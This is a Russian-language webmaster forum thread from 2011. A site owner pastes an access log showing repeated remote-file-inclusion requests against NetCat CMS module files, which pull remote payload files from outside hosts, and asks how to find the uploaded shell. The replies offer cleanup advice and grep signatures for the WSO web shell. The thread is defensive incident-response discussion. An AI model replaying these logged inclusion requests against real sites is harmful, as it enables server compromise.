    90.156.197.110 - - [03/Dec/2011:15:35:12 +0300] "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:15:35:13 +0300] 200 "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:15:35:14 +0300] "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:15:35:14 +0300] 200 "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:15:35:15 +0300] "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://58.141.76.253:8080/design07/a...dvdpagat.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:15:35:15 +0300] 200 "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://58.141.76.253:8080/design07/a...dvdpagat.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:15:35:15 +0300] "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:15:35:15 +0300] 200 "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://210.245.85.110:32000/link.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:15:35:16 +0300] "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:15:35:16 +0300] 200 "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://210.245.85.110:32000/link.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:20:00:50 +0300] "GET /netcat/modules/auth/password_recovery.php//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=test?? HTTP/1.0" 200 5102 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:20:00:50 +0300] 200 "GET /netcat/modules/auth/password_recovery.php//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=test?? HTTP/1.1" 4497 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:20:00:51 +0300] "GET /netcat/modules/auth/password_recovery.php//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.0" 200 5127 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:20:00:51 +0300] 200 "GET /netcat/modules/auth/password_recovery.php//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.1" 4522 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:20:00:51 +0300] "GET /netcat/modules/auth/password_recovery.php//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 5134 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:20:00:51 +0300] 200 "GET /netcat/modules/auth/password_recovery.php//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 4529 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:20:00:52 +0300] "GET /netcat/modules/auth/password_recovery.php//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 5134 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:20:00:53 +0300] 200 "GET /netcat/modules/auth/password_recovery.php//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 4529 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:20:00:54 +0300] "GET //netcat/modules/forum2/function.inc.php?MODULE_FOLDER=test?? HTTP/1.0" 200 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:20:00:54 +0300] 200 "GET //netcat/modules/forum2/function.inc.php?MODULE_FOLDER=test?? HTTP/1.1" 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:20:00:55 +0300] "GET //netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.0" 200 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:20:00:55 +0300] 200 "GET //netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.1" 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:20:00:55 +0300] "GET //netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:20:00:55 +0300] 200 "GET //netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:20:00:56 +0300] "GET //netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:20:00:56 +0300] 200 "GET //netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:20:00:57 +0300] "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=test?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:20:00:57 +0300] 200 "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=test?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:20:00:59 +0300] "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:20:00:59 +0300] 200 "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:20:00:59 +0300] "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:20:00:59 +0300] 200 "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:20:01:00 +0300] "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:20:01:00 +0300] 200 "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:20:01:01 +0300] "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://58.141.76.253:8080/design07/a...dvdpagat.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:20:01:01 +0300] 200 "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://58.141.76.253:8080/design07/a...dvdpagat.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:20:01:01 +0300] "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:20:01:02 +0300] 200 "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://210.245.85.110:32000/link.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:20:01:03 +0300] "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:20:01:03 +0300] 200 "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://210.245.85.110:32000/link.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    [свернуть]
    По логу видно что заливали на сайт шелл.
    Но облазив весь сайт я нечего не нашел.
    Зато нашел тему "Продам пару шеллов" на ачате где продают доступ к мои сайтам.

    Прошу форумчан помочь советами, что собственно делать?
    Как найти шелл на сайте?
    Если шелла нет, то значит должен он был оставить какой то вредоносный код? Если да то как обнаружить код?

    ЗЫ - Движок обновил. Бекап восстановить не могу, последний 04.12 а перед эти очень давно делался...
    Последний раз редактировалось Elsone; 08.12.2011 в 05:18.
    --->>>Вывод WebMoney 1 WMR = 1 RUR Сбер, Альфа, РСБ<<<------>>>Вывод WebMoney 1 WMU = 1 UAH Приват<<<---
    • 0
  2. 08.12.2011 08:20
    #2
    .2FED вне форума
    .2FED
    Студент Аватар для .2FED
    • Регистрация: 17.01.2011
    • Сообщений: 68
    • Репутация: 41
    Смотрите через ftp файлы с недавней датой изменения.
    Скорее всего обычный запароленный .php файл.
    В первую очередь смотрите на каталоги с правами на запись, типа /images/ и т.д.
    Последний раз редактировалось .2FED; 08.12.2011 в 08:23.
    • 1

    Спасибо сказали:
    Elsone(08.12.2011),
  3. Значок / Очков: 5
    08.12.2011 08:27
    #3
    hronny вне форума
    hronny
    Гуру Аватар для hronny
    • Регистрация: 07.06.2011
    • Сообщений: 1,090
    • Репутация: 416
    • Webmoney BL: ?
    Посмотрите, каким образом шелл вообще могли залить. Побудьте хакером на своем сайте. Через какие поля могли сделать инъекции, как могла пройти инъекция, как могли попасть в админку. Полазьте по багтрекам. Но в самую первую очередь посмотрите список администраторов и смените все пароли. Даже для доступа через шелл нужны админские права.
    • 1

    Спасибо сказали:
    Elsone(08.12.2011),
  4. Значок / Очков: 5
    08.12.2011 11:12
    #4
    hronny вне форума
    hronny
    Гуру Аватар для hronny
    • Регистрация: 07.06.2011
    • Сообщений: 1,090
    • Репутация: 416
    • Webmoney BL: ?
    В public_html поищите файл yx29sh.php

    В последних строках кода есть ссылка на листинг инъекторов. В одном из листингов инъектор создает вышеуказанный файл на атакуемом ресурсе.

    Ксакеп прролез к вам через форму восстановления пароля, что-то поделал в файлменеджере.

    Для операций с файлами нужны админские права или у вас неправильно настроены права доступа.

    Большего не скажу, я не спец по ИБ и не взломщик. Можно попробовать обратиться к разработчику ЦМС и попросить его разобраться. И вам польза, и прогер может обнаружить новую дырку в его цмс.
    • 1

    Спасибо сказали:
    Elsone(08.12.2011),
  5. Значок / Очков: 5
    08.12.2011 11:55
    #5
    arbitr вне форума
    arbitr
    Дипломник Аватар для arbitr
    • Регистрация: 12.04.2011
    • Сообщений: 99
    • Репутация: 42
    Смотрите базы данных, шелл может физически и не находится на вашем хосте, и в Index.php хорошо все проверьте
    Есть посещаемые сайты? Тогда это для Вас!
    • 1

    Спасибо сказали:
    Elsone(08.12.2011),
  6. Значок / Очков: 5 Значок / Очков: 5 Значок / Очков: 5 Значок / Очков: 5
    08.12.2011 12:55
    #6
    Демиург вне форума
    Демиург
    Super Moderator Аватар для Демиург
    • Регистрация: 09.06.2011
    • Сообщений: 2,212
    • Репутация: 1782
    • Webmoney BL: ?
    Я раз в месяц скачиваю все файлы с фтп к себе на комп. Несколько раз матюгался каспер. Матюгался на шелл, показывая мне заодно и путь к нему.
    Семейные путешествия по Европе на автомобиле
    • 1

    Спасибо сказали:
    Elsone(08.12.2011),
  7. Значок / Очков: 5
    08.12.2011 13:26
    #7
    Elsone вне форума
    Elsone
    Вечно пьян о_О Аватар для Elsone
    • Регистрация: 12.04.2011
    • Сообщений: 794
    • Репутация: 298
    .2FED, Это около 1500 файлов нужно проверить.
    hronny, Админов лишних нет, так же нет юзеров с правами доступа. Разработчику написали, передали логи, пока молчат. Такого файла yx29sh.php не нашел.
    Демиург, Выкачивал файлы и проверял двумя антивирусами, нечего не было найдено (ставил максимальные настройки антивируса при проверке)
    Последний раз редактировалось Elsone; 08.12.2011 в 13:48.
    --->>>Вывод WebMoney 1 WMR = 1 RUR Сбер, Альфа, РСБ<<<------>>>Вывод WebMoney 1 WMU = 1 UAH Приват<<<---
    • 0
  8. 08.12.2011 15:27
    #8
    .2FED вне форума
    .2FED
    Студент Аватар для .2FED
    • Регистрация: 17.01.2011
    • Сообщений: 68
    • Репутация: 41
    Цитата Сообщение от Elsone Посмотреть сообщение
    Выкачивал файлы и проверял двумя антивирусами, нечего не было найдено (ставил максимальные настройки антивируса при проверке)
    Полностью бесполезное занятие, т.к. шелл WSO, к примеру палится только 1 антивирусом(Avast вроде бы, но не уверен), а если его зашифровать, то ни один антивирус не найдет.

    Можно попробовать запустить поиск по содержимому файлов:
    Код: 
    $default_action = 'FilesMan';
    или
    Код: 
    $default_use_ajax = true;
    (пример конкретно для WSO, т.к. он один из самых полулярных в ру)
    • 1

    Спасибо сказали:
    Elsone(08.12.2011),
  9. Значок / Очков: 5
    08.12.2011 15:48
    #9
    Elsone вне форума
    Elsone
    Вечно пьян о_О Аватар для Elsone
    • Регистрация: 12.04.2011
    • Сообщений: 794
    • Репутация: 298
    .2FED, Авастом тоже проверял, нечего не нашел.
    Поиск по содержимому нашел вредоносный файлик, но не на том сайте что нужно. Но все равно спасибо.
    --->>>Вывод WebMoney 1 WMR = 1 RUR Сбер, Альфа, РСБ<<<------>>>Вывод WebMoney 1 WMU = 1 UAH Приват<<<---
    • 0
  10. 09.12.2011 15:14
    #10
    lockners вне форума
    lockners
    Студент Аватар для lockners
    • Регистрация: 14.10.2011
    • Сообщений: 42
    • Репутация: 7
    • Webmoney BL: ?
    Elsone

    Запрети в дирикториях через htaccess запуск сртороних скриптов с разными разширениями.

    Htaccces
    • 0

Тэги топика:

« Абракадабра после переноса сайта на другой хостинг | Влияние шаблона на индексацию и продвижение сайта »
(добавить баннер)

Баннеры



(добавить ссылку)

Витрина ссылок

У нас проходит

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Или перенести аккаунт с других форумов

Золотые темы форума

Все золотые темы

Популярные темы

Информеры